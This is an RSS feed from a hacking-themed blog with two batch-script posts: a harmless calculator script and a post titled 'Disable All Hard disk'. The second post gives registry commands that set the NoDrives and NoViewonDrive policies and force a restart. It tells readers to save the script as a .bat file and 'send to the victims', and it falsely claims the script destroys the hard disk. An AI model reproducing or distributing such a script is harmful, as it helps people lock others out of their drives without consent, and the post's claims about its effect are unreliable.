<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
> <channel><title>Hack Illusion &#187; Batch</title> <atom:link href="http://www.hackillusion.com/batch/feed/" rel="self" type="application/rss+xml" /><link>http://www.hackillusion.com</link> <description>Pardon the Illusion lets get hacked!!!</description> <lastBuildDate>Fri, 17 May 2013 05:33:26 +0000</lastBuildDate> <language>en-US</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.5.1</generator> <item><title>Create Your Own Calculator Using Batch Programming</title><link>http://www.hackillusion.com/create-your-own-calculator-using-batch/</link> <comments>http://www.hackillusion.com/create-your-own-calculator-using-batch/#comments</comments> <pubDate>Fri, 22 Jul 2011 08:13:00 +0000</pubDate> <dc:creator>Shubham Yadav</dc:creator> <category><![CDATA[Batch]]></category> <category><![CDATA[How To]]></category> <guid
isPermaLink="false">http://www.hackillusion.com/2011/07/create-your-own-calculator-using-batch-programming.html</guid> <description><![CDATA[<p>Hello Friends,Here I am sharing the Batch Code to create your own calculator. @echo off title Your title goes here color 1f :top echo &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; echo Print Welcome Msg Here echo &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; echo. set /p udefine= set /a udefine=%udefine% echo. echo = %udefine% echo &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; pause cls echo Previous Answer: %udefine% goto top pause exit [...]</p><p>The post <a
href="http://www.hackillusion.com/create-your-own-calculator-using-batch/">Create Your Own Calculator Using Batch Programming</a> appeared first on <a
href="http://www.hackillusion.com">Hack Illusion</a>.</p><div
class='yarpp-related-rss'><h3>Related posts:</h3><div
class="yarpp-thumbnails-horizontal"> <a
class='yarpp-thumbnail' href='http://www.hackillusion.com/how-to-convert-chm-to-pdf/' title='How to Convert CHM to PDF'> <span
class="yarpp-thumbnail-default"><img
src="http://www.hackillusion.com/wp-content/plugins/yet-another-related-posts-plugin/default.png"/></span><span
class="yarpp-thumbnail-title">How to Convert CHM to PDF</span></a></div></div> ]]></description> <content:encoded><![CDATA[<div
dir="ltr" style="text-align: left;" trbidi="on">Hello Friends,<br
/>Here I am sharing the Batch Code to create your own calculator.<br
/><blockquote>@echo off <br
/>title <strong>Your title goes here</strong> <br
/>color 1f <br
/>:top <br
/>echo &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br
/>echo <strong>Print Welcome Msg Here</strong> <br
/>echo &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br
/>echo. <br
/>set /p udefine= <br
/>set /a udefine=%udefine% <br
/>echo. <br
/>echo = %udefine% <br
/>echo &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; <br
/>pause <br
/>cls <br
/>echo Previous Answer: %udefine% <br
/>goto top <br
/>pause <br
/>exit</p></blockquote><p>Copy above code in notepad and save with .bat extension.<br
/><a
href="http://i2.wp.com/lh5.ggpht.com/-KyoYmoBFFKo/TikxQKP_6aI/AAAAAAAAAJ8/quCUyI5HQZg/s1600-h/calc11.png"><img
alt="calc" border="0" src="http://i0.wp.com/lh5.ggpht.com/-3Kmjvqxv95Y/TikxRpl9KDI/AAAAAAAAAKA/0lismRKxKAk/calc_thumb9.png?resize=591%2C316" style="background-image: none; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; display: block; float: none; margin: 0px auto 4px; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="calc" data-recalc-dims="1" /></a></div><p>The post <a
href="http://www.hackillusion.com/create-your-own-calculator-using-batch/">Create Your Own Calculator Using Batch Programming</a> appeared first on <a
href="http://www.hackillusion.com">Hack Illusion</a>.</p><div
class='yarpp-related-rss'><h3>Related posts:</h3><div
class="yarpp-thumbnails-horizontal"> <a
class='yarpp-thumbnail' href='http://www.hackillusion.com/how-to-convert-chm-to-pdf/' title='How to Convert CHM to PDF'> <span
class="yarpp-thumbnail-default"><img
src="http://www.hackillusion.com/wp-content/plugins/yet-another-related-posts-plugin/default.png"/></span><span
class="yarpp-thumbnail-title">How to Convert CHM to PDF</span></a></div></div> ]]></content:encoded> <wfw:commentRss>http://www.hackillusion.com/create-your-own-calculator-using-batch/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Disable All Hard disk</title><link>http://www.hackillusion.com/disable-all-hard-disk/</link> <comments>http://www.hackillusion.com/disable-all-hard-disk/#comments</comments> <pubDate>Fri, 15 Jul 2011 11:33:00 +0000</pubDate> <dc:creator>Shubham Yadav</dc:creator> <category><![CDATA[Batch]]></category> <category><![CDATA[Ethical Hacking]]></category> <category><![CDATA[Virus]]></category> <guid
isPermaLink="false">http://www.hackillusion.com/2011/07/disable-all-hard-disk.html</guid> <description><![CDATA[<p>Hello Friends,Here I am posting an tutorial for disable all hard disk. For this we used Batch programming. Don’t worry I don’t say you to do programming in batch. You just have to copy paste this on notepad and saved with .bat extension and send to the victims. REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t [...]</p><p>The post <a
href="http://www.hackillusion.com/disable-all-hard-disk/">Disable All Hard disk</a> appeared first on <a
href="http://www.hackillusion.com">Hack Illusion</a>.</p><div
class='yarpp-related-rss'><h3>Related posts:</h3><div
class="yarpp-thumbnails-horizontal"> <a
class='yarpp-thumbnail' href='http://www.hackillusion.com/how-to-increase-hard-disk-speed-in/' title='How to Increase Hard Disk speed in Windows'> <span
class="yarpp-thumbnail-default"><img
src="http://www.hackillusion.com/wp-content/plugins/yet-another-related-posts-plugin/default.png"/></span><span
class="yarpp-thumbnail-title">How to Increase Hard Disk speed in Windows</span></a> <a
class='yarpp-thumbnail' href='http://www.hackillusion.com/how-to-hide-hard-disk-on-windows/' title='How to Hide Hard Drive on Windows'> <span
class="yarpp-thumbnail-default"><img
src="http://www.hackillusion.com/wp-content/plugins/yet-another-related-posts-plugin/default.png"/></span><span
class="yarpp-thumbnail-title">How to Hide Hard Drive on Windows</span></a> <a
class='yarpp-thumbnail' href='http://www.hackillusion.com/how-to-enable-or-disable-usb-port/' title='How to Enable or Disable the USB Port'> <img
src="http://i0.wp.com/www.hackillusion.com/wp-content/uploads/2012/09/usb+port1.jpg?resize=120%2C120" class="attachment-yarpp-thumbnail wp-post-image" alt="usb+port1" /><span
class="yarpp-thumbnail-title">How to Enable or Disable the USB Port</span></a></div></div> ]]></description> <content:encoded><![CDATA[<p>Hello Friends,<br
/>Here I am posting an tutorial for disable all hard disk. For this we used Batch programming. Don’t worry I don’t say you to do programming in batch. You just have to copy paste this on notepad and saved with .bat extension and send to the victims.</p><p><blockquote>REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n<br
/>REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n<br
/>shutdown -r -c \&#8221;<span
class="Apple-style-span" style="color: #3d85c6;">Type Your Message Here..</span>\&#8221; -f</p></blockquote><p>Don’t open this code on your computer, It will be destroy your Hard Disk.</p><p>The post <a
href="http://www.hackillusion.com/disable-all-hard-disk/">Disable All Hard disk</a> appeared first on <a
href="http://www.hackillusion.com">Hack Illusion</a>.</p><div
class='yarpp-related-rss'><h3>Related posts:</h3><div
class="yarpp-thumbnails-horizontal"> <a
class='yarpp-thumbnail' href='http://www.hackillusion.com/how-to-increase-hard-disk-speed-in/' title='How to Increase Hard Disk speed in Windows'> <span
class="yarpp-thumbnail-default"><img
src="http://www.hackillusion.com/wp-content/plugins/yet-another-related-posts-plugin/default.png"/></span><span
class="yarpp-thumbnail-title">How to Increase Hard Disk speed in Windows</span></a> <a
class='yarpp-thumbnail' href='http://www.hackillusion.com/how-to-hide-hard-disk-on-windows/' title='How to Hide Hard Drive on Windows'> <span
class="yarpp-thumbnail-default"><img
src="http://www.hackillusion.com/wp-content/plugins/yet-another-related-posts-plugin/default.png"/></span><span
class="yarpp-thumbnail-title">How to Hide Hard Drive on Windows</span></a> <a
class='yarpp-thumbnail' href='http://www.hackillusion.com/how-to-enable-or-disable-usb-port/' title='How to Enable or Disable the USB Port'> <img
src="http://i0.wp.com/www.hackillusion.com/wp-content/uploads/2012/09/usb+port1.jpg?resize=120%2C120" class="attachment-yarpp-thumbnail wp-post-image" alt="usb+port1" /><span
class="yarpp-thumbnail-title">How to Enable or Disable the USB Port</span></a></div></div> ]]></content:encoded> <wfw:commentRss>http://www.hackillusion.com/disable-all-hard-disk/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>